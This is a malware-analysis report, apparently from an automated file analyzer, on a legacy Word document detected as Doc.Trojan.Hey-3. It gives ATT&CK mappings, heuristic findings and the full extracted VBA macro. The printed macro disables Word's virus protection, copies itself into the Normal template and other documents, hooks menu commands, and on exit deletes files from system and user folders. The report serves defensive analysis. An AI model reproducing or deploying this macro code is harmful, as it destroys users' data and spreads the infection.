MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1485 Data Destruction
The sample is a legacy Word document containing a VBA macro with an AutoOpen subroutine. This macro attempts to disable virus protection and then proceeds to delete files from various directories including system and user document locations. The presence of the AutoOpen macro and the file deletion attempts strongly indicate a malicious intent, likely delivered via spearphishing.
Heuristics 4
-
ClamAV: Doc.Trojan.Hey-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hey-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1877 bytes |
SHA-256: 69482149f77141d87a3693955d8fa01fba9aa07f9ce3e9e32ceab902196c9691 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modulo1"
Sub AutoOpen(): Options.VirusProtection = 0: ÆÏ©§¥: End Sub
Sub ÆÏ©§¥()
Set ú = NormalTemplate.VBProject.VBComponents(1).CodeModule: Set ó = ActiveDocument.VBProject.VBComponents(1).CodeModule: Set ý = ThisDocument.VBProject.VBComponents(1).CodeModule:
If ú.CountOfLines = 0 Then ú.InsertLines 1, ý.Lines(1, 47)
If ó.CountOfLines = 0 Then ó.InsertLines 1, ý.Lines(1, 40)
CommandBars("Tools").Controls("Makro").Delete
End Sub
Sub AutoNew(): ÆÏ©§¥: End Sub
Sub DocumentNew(): ÆÏ©§¥: End Sub
Sub DocumentOpen(): ÆÏ©§¥: End Sub
Sub DateiÖffnen(): ÆÏ©§¥: End Sub
Sub DateiBeenden(): ÆÏ©§¥: End Sub
Sub BearbeitenKopieren(): ÆÏ©§¥: End Sub
Sub BearbeitenEinfügen(): ÆÏ©§¥: End Sub
Sub BearbeitenAusschneiden(): ÆÏ©§¥: End Sub
Sub FormatZeichen(): ÆÏ©§¥: End Sub
Sub FormatAbsatz(): ÆÏ©§¥: End Sub
Sub FormatSpalten(): ÆÏ©§¥: End Sub
Sub FormatTabulator(): ÆÏ©§¥: End Sub
Sub FormatHintergrund(): ÆÏ©§¥: End Sub
Sub FormatAutoFormat(): ÆÏ©§¥: End Sub
Sub ExtrasAnpassen(): ÆÏ©§¥: End Sub
Sub ExtrasOptionen(): ÆÏ©§¥: End Sub
Sub ExtrasAutoKorrektur(): ÆÏ©§¥: End Sub
Sub DateiSchließen(): ÆÏ©§¥: End Sub
Sub AutoExit(): ÆÏ©§¥: If Day(31) And Month(Now) Then Call ¢¤£: End Sub
Sub ¢¤£()
On Error Resume Next
Kill "C:\*.*"
Kill "C:\Windows\*.*"
Kill "C:\Windows\System\*.*"
Kill "C:\Windows\System32\*.*"
Kill "C:\Windows\Eigene Dateien\*.*"
Kill "C:\Eigene Dateien\*.*"
Kill "C:\Dokumente\*.*"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.